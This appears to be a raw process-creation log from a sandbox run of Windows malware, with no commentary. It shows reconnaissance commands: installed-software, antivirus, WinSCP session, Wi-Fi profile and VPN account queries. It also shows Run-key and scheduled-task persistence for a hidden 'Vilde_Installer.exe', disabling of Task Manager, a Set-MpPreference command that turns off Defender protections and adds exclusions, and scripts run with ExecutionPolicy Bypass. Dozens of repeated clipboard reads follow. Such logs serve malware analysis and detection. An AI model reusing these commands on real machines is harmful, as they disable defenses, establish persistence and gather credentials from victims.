C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\k02v5td4czh8_tezmp.ps1""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\k02v5td4czh8_tezmp.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "function Get-AntiVirusProduct {
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetup79mlt7 /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Vilde_Installer.exe /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetup79mlt7 /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Vilde_Installer.exe\" /F /rl highest"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetup79mlt7 /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Vilde_Installer.exe /f
C:\Windows\system32\cmd.exe
cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetup79mlt7 /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Vilde_Installer.exe\" /F /rl highest
C:\Windows\system32\schtasks.exe
schtasks /create /sc onlogon /tn WindowsDriverSetup79mlt7 /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Vilde_Installer.exe\" /F /rl highest
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Vilde_Installer.exe\"""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Vilde_Installer.exe\""
C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Vilde_Installer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Vilde_Installer.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\Z6lb7Te0yUSq.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\cscript.exe
cscript C:\Users\Admin\AppData\Roaming\Z6lb7Te0yUSq.vbs
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut9kB5O.ps1" -RunAsAdministrator"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut9kB5O.ps1" -RunAsAdministrator
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\GooseDesktop.exe""
C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\GooseDesktop.exe
"C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\GooseDesktop.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f8 0x404
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
